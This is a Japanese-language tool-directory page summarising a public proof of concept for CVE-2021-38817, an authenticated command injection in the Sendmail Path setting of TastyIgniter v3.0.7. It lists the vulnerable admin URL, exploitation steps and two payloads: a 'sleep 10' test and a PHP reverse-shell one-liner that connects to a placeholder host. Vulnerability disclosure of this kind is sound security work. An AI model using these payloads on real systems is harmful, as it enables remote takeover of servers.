Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-38817-Remote-OS-Command-Injection — TastyIgniter v3.0.7 Sendmail Path フィールドにおけるリモートOSコマンドインジェクション | Kitploit
ツール/GitHubGitHub/huskyhacks/cve-2021-38817-remote-os-command-injection
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubhuskyhacks/cve-2021-38817-remote-os-command-injection

CVE-2021-38817-Remote-OS-Command-Injection

TastyIgniter v3.0.7 Sendmail Path フィールドにおけるリモートOSコマンドインジェクション

リポジトリを見る
92413年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-38817-リモートOSコマンドインジェクション

TastyIgniter v3.0.7 Sendmail Webパートにおける認証済みリモートOSコマンドインジェクション/リモートコード実行 (CVE-2021-38817)

TastyIgniter v3.0.7 レストランCMS WebアプリケーションのSendmail設定メニューには、認証済みリモートOSコマンドインジェクションの脆弱性が存在します。Sendmail Pathパラメータは適切にサニタイズされておらず、フィールドに入力されている /usr/sbin/sendmail -bs コマンドが示すように、セミコロンと追加のOSコマンドを追加することで任意のコマンドを注入できます。

影響を受けるコンポーネント

URL: /admin/settings/edit/mail

フィールド:

  • メールプロトコル: Sendmail
  • フィールド: Sendmail Path

POC

  • 認証情報を使用して /admin ポータルに認証します。
  • /admin/settings/edit/mail に移動します。
  • Mail Protocol ドロップダウンメニューで Sendmail を選択します。
  • 新しい SendMail Path フィールドに、セミコロンと任意のOSコマンドを追加します。例: /usr/sbin/sendmail -bs; sleep 10
  • ペイロード

    • /usr/sbin/sendmail -bs; sleep 10
    • /usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'

    TastyIgniterCVE

    発見者

    Matt Kiely (HuskyHacks) と Mike Padrick (Fearless)、2021年8月

    CVE は2022年10月に割り当て (笑)

    ツールをダウンロード